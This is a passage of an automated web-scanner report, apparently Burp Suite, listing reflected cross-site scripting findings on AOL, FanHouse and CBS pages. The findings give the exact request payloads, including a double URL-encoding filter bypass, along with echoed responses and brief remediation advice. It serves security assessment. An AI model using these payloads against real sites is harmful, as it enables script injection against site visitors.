1.167. http://news.travel.aol.com/2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21590"><script>alert(1)</script>0c2f336d704 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/?21590"><script>alert(1)</script>0c2f336d704=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:20 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:19 GMT; path=/
Keep-Alive: timeout=5, max=999975
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 70564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/?21590"><script>alert(1)</script>0c2f336d704=1" />
...[SNIP]...

1.168. http://news.travel.aol.com/2011/01/12/travel-myths-debunked/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /2011/01/12/travel-myths-debunked/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de56"><script>alert(1)</script>fa2fd84284b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/12/travel-myths-debunked/?5de56"><script>alert(1)</script>fa2fd84284b=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:23 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:22 GMT; path=/
Keep-Alive: timeout=5, max=999980
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 108204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/2011/01/12/travel-myths-debunked/?5de56"><script>alert(1)</script>fa2fd84284b=1" />
...[SNIP]...

1.169. http://news.travel.aol.com/2011/02/04/pilot-falls-into-deep-sleep-on-sas-flight/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /2011/02/04/pilot-falls-into-deep-sleep-on-sas-flight/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d2d5"><script>alert(1)</script>d79e2e7793e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/04/pilot-falls-into-deep-sleep-on-sas-flight/?4d2d5"><script>alert(1)</script>d79e2e7793e=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:23 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:22 GMT; path=/
Keep-Alive: timeout=5, max=999914
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 94538

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/2011/02/04/pilot-falls-into-deep-sleep-on-sas-flight/?4d2d5"><script>alert(1)</script>d79e2e7793e=1" />
...[SNIP]...

1.170. http://news.travel.aol.com/2011/02/04/virginia-hotel-casts-out-snow-refugees/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /2011/02/04/virginia-hotel-casts-out-snow-refugees/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9a1e"><script>alert(1)</script>7f2ad4a8dc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/04/virginia-hotel-casts-out-snow-refugees/?a9a1e"><script>alert(1)</script>7f2ad4a8dc9=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:22 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:21 GMT; path=/
Keep-Alive: timeout=5, max=999947
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 67545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/2011/02/04/virginia-hotel-casts-out-snow-refugees/?a9a1e"><script>alert(1)</script>7f2ad4a8dc9=1" />
...[SNIP]...

1.171. http://news.travel.aol.com/2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5186"><script>alert(1)</script>a0c68995fa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/?b5186"><script>alert(1)</script>a0c68995fa0=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:27 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:26 GMT; path=/
Keep-Alive: timeout=5, max=999997
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 89970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/?b5186"><script>alert(1)</script>a0c68995fa0=1" />
...[SNIP]...

1.172. http://news.travel.aol.com/2011/02/05/american-plane-and-air-force-jets-in-near-miss/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /2011/02/05/american-plane-and-air-force-jets-in-near-miss/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a878f"><script>alert(1)</script>e0f1e935f50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/05/american-plane-and-air-force-jets-in-near-miss/?a878f"><script>alert(1)</script>e0f1e935f50=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:26 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:25 GMT; path=/
Keep-Alive: timeout=5, max=999904
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 92947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/2011/02/05/american-plane-and-air-force-jets-in-near-miss/?a878f"><script>alert(1)</script>e0f1e935f50=1" />
...[SNIP]...

1.173. http://news.travel.aol.com/best-of/when-is-ash-wednesday-2011/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /best-of/when-is-ash-wednesday-2011/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15cf3"><script>alert(1)</script>4e8bf31abab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /best-of/when-is-ash-wednesday-2011/?15cf3"><script>alert(1)</script>4e8bf31abab=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:25 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:24 GMT; path=/
Keep-Alive: timeout=5, max=999980
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 65475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/best-of/when-is-ash-wednesday-2011/?15cf3"><script>alert(1)</script>4e8bf31abab=1" />
...[SNIP]...

1.174. http://news.travel.aol.com/explore-america/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /explore-america/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc0f9"><script>alert(1)</script>d8df1da81dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /explore-america/?fc0f9"><script>alert(1)</script>d8df1da81dc=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:47 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999929
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 52589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="alternate" type=
...[SNIP]...
<link rel="canonical" href="http://news.travel.aol.com/explore-america/?fc0f9"><script>alert(1)</script>d8df1da81dc=1" />
...[SNIP]...

1.175. http://news.travel.aol.com/hotel/inside-the-royalton-in-new-york-city/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /hotel/inside-the-royalton-in-new-york-city/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82562"><script>alert(1)</script>fa0b25a6bcf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/inside-the-royalton-in-new-york-city/?82562"><script>alert(1)</script>fa0b25a6bcf=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:53 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:52 GMT; path=/
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 75825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/hotel/inside-the-royalton-in-new-york-city/?82562"><script>alert(1)</script>fa0b25a6bcf=1" />
...[SNIP]...

1.176. http://news.travel.aol.com/hotel/los-angeles-hotels-near-lax/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /hotel/los-angeles-hotels-near-lax/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9529f"><script>alert(1)</script>db864afbfc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/los-angeles-hotels-near-lax/?9529f"><script>alert(1)</script>db864afbfc3=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:51 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:50 GMT; path=/
Keep-Alive: timeout=5, max=999977
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 76721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/hotel/los-angeles-hotels-near-lax/?9529f"><script>alert(1)</script>db864afbfc3=1" />
...[SNIP]...

1.177. http://nfl.fanhouse.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nfl.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9200f"-alert(1)-"9027b25266b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?9200f"-alert(1)-"9027b25266b=1 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:55 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 111277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
,fanhouse.com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="NFL";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://nfl.fanhouse.com/?9200f"-alert(1)-"9027b25266b=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.178. http://nfl.fanhouse.com/superbowl [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nfl.fanhouse.com
Path:   /superbowl

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fdd"><script>alert(1)</script>96eb04b239 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /superbowlf1fdd"><script>alert(1)</script>96eb04b239 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:57 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999782
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 25671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
<link rel="canonical" href="http://nfl.fanhouse.com/superbowlf1fdd"><script>alert(1)</script>96eb04b239"/>
...[SNIP]...

1.179. http://nfl.fanhouse.com/superbowl [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nfl.fanhouse.com
Path:   /superbowl

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8568c"-alert(1)-"007a301d86a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /superbowl8568c"-alert(1)-"007a301d86a HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:58 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999759
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 25643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
.com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="NFL";
s_265.prop2="error";
s_265.prop9="";
s_265.prop12="http://nfl.fanhouse.com/superbowl8568c"-alert(1)-"007a301d86a";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.180. http://nfl.fanhouse.com/superbowl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nfl.fanhouse.com
Path:   /superbowl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2724f"><script>alert(1)</script>d81db27d9b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /superbowl?2724f"><script>alert(1)</script>d81db27d9b5=1 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:53 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999997
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 78675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
<link rel="canonical" href="http://nfl.fanhouse.com/superbowl?2724f"><script>alert(1)</script>d81db27d9b5=1"/>
...[SNIP]...

1.181. http://nfl.fanhouse.com/superbowl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nfl.fanhouse.com
Path:   /superbowl

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0873"-alert(1)-"cfe39284596 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /superbowl?e0873"-alert(1)-"cfe39284596=1 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:53 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 78600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
mafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="NFL";
s_265.prop2="super-bowl";
s_265.prop9="";
s_265.prop12="http://nfl.fanhouse.com/superbowl?e0873"-alert(1)-"cfe39284596=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.182. http://nhl.fanhouse.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nhl.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79d0e"-alert(1)-"693917f6b35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?79d0e"-alert(1)-"693917f6b35=1 HTTP/1.1
Host: nhl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:53 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999796
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 78175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
,fanhouse.com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="NHL";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://nhl.fanhouse.com/?79d0e"-alert(1)-"693917f6b35=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.183. http://noticias.aol.com/category/latino-news/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://noticias.aol.com
Path:   /category/latino-news/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8256c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17094e0f3fe was submitted in the REST URL parameter 2. This input was echoed as 8256c</script><script>alert(1)</script>17094e0f3fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /category/latino-news8256c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17094e0f3fe/ HTTP/1.1
Host: noticias.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:24:04 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999895
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 32777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
       <title>Posts from the L
...[SNIP]...
<!--
function runOmni()
{
s_265.pfxID="ltn";
s_265.pageName="" + " | " + "Latino News8256c</script><script>alert(1)</script>17094e0f3fe";
s_265.server="";
s_265.channel="us.latnot";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,noticias.aol.com";
s_265.prop1="";
s_265.prop2="Latino News8
...[SNIP]...

1.184. http://ocp.cbs.com/pacific/Response.jsp [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ocp.cbs.com
Path:   /pacific/Response.jsp

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 93d1a<a>32b91cfbcdc was submitted in the c parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

